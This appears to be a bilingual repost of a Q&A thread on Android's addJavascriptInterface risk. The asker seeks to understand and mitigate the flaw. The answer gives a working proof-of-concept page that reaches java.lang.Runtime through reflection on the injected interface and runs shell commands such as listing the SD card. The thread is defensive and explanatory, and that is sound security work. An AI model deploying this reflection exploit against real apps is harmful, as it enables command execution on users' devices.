Android JavascriptInterface 安全性? [英] Android JavascriptInterface Security?

问题描述

来自文档:http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29

"使用 addJavascriptInterface() 允许 JavaScript 控制您的应用程序.这可能是一个非常有用的功能或危险的安全问题.当 WebView 中的 HTML 不可信时(例如，部分或全部 HTML 由某些人或进程)，然后攻击者可以注入 HTML 来执行您的代码以及攻击者选择的任何代码.除非此 WebView 中的所有 HTML 均由您编写，否则请勿使用 addJavascriptInterface().绑定的 Java 对象在另一个线程中运行，而不是在构造它的线程中运行.

"Using addJavascriptInterface() allows JavaScript to control your application. This can be a very useful feature or a dangerous security issue. When the HTML in the WebView is untrustworthy (for example, part or all of the HTML is provided by some person or process), then an attacker could inject HTML that will execute your code and possibly any code of the attacker's choosing. Do not use addJavascriptInterface() unless all of the HTML in this WebView was written by you. The Java object that is bound runs in another thread and not in the thread that it was constructed in.

假设我有一个只显示自定义对话框的界面，或者开始下载到 sd 卡.这对任何网址使用都会不安全吗?攻击页面如何使用该界面运行攻击者选择的任何代码?

更新:根据 文档:

这个方法可以用来让JavaScript控制主机应用.这是一个强大的功能，但也提供了一个安全针对 API 级别 JELLY_BEAN 或更低级别的应用程序的风险，因为 JavaScript 可以使用反射来访问注入对象的公共领域.在包含不受信任的 WebView 中使用此方法内容可能允许攻击者操纵主机应用程序意想不到的方式，在宿主的权限下执行Java代码应用.在 WebView 中使用此方法时要格外小心其中可能包含不受信任的内容.

This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLY_BEAN or below, because JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

有没有例子说明这种情况是如何发生的?这只是说 DOWNLOADINTERFACE.dangerousfunction 可以被调用，如果那是该类的公共方法?

Is there an example of how this could happen? It this just saying that DOWNLOADINTERFACE.dangerousfunction could be called if that's a public method on that class?

更新:

我根据下面的漏洞利用示例进行了测试，网站可以通过Android 4.4、4.1和3.2中的接口访问系统.

I tested based on the example of the exploit below, sites can get access to the system through interfaces in Android 4.4, 4.1, and 3.2.

但是，我没有在 Android 2.2 或 2.3 上看到此错误，该破解只会导致强制关闭.除了不使用 JSInterface 之外，防止这种 hack 的最佳方法是什么?我可以包含这样的虚假函数，以防止未经授权的函数调用吗?

However, I was not seeing this bug on Android 2.2, or 2.3, the hack only causes a force-close. What is the best way to prevent this hack, other than not using JSInterface? Can I include bogus functions like this, to prevent unauthorized calling of functions?

public Object getClass() {
  //throw error, return self, or something?  
}

还是使用ajax和拦截调用重写一切?这会导致更好/更差的性能吗?

Or rewrite everything using ajax and intercepting calls? Would that result in better/worse performance?

更新:

我成功地移除了 JS 接口，并通过为所有 window.(interface) 函数定义 window.open(specialurl) 命令并覆盖 shouldOverrideUrlLoading 中的那些来替换功能.奇怪的是，在某些情况下必须使用 window.open()，否则 webview 会中断显示(比如 javascript 正在停止?)，而在其他情况下，应该使用 location.replace 否则它只会显示interface://specialdata" 无法找到消息.

I succeeded in removing the JS interface, and replaced the functionality by defining window.open(specialurl) commands for all the window.(interface) functions, and overriding those in the shouldOverrideUrlLoading. Strangely enough, window.open() must be used in some cases, or the webview breaks display (like javascript is stopping?), and in other cases location.replace should be used or it will just show a "interface://specialdata" could not be found message.

(我设置 settings.setJavaScriptCanOpenWindowsAutomatically(true) 所以 window.open 一直在 JS 中工作.)

(I set settings.setJavaScriptCanOpenWindowsAutomatically(true) so window.open works from JS all the time.)

有人知道用这种行为重写应用的最佳方法吗?

Anyone know the best way to rewrite an app with this behavior?

推荐答案

从 javascript 访问 sdcard 文件的示例:

an example access sdcard files from javascript:

<html>
  <head>
    <script>

      function getContents(inputStream)
    {
        var contents = "";
        var b = inputStream.read();
        var i = 1;
        while(b != -1) {
            var bString = String.fromCharCode(b);
            contents += bString;
            b = inputStream.read();
        }
        return contents;
    }

       function execute(cmdArgs)
     {
       //  go_back_js_interface_name is the registered java interface.
       //  it is an object, but is not iterable with for (var i in interface) {...}.
       return go_back_js_interface_name.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
     } 

      var p = execute(["ls","/mnt/sdcard/"]);
      document.write(getContents(p.getInputStream()));

    </script>
  </head>
  <body>
    Test
  </body>
</html>

这篇关于Android JavascriptInterface 安全性?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！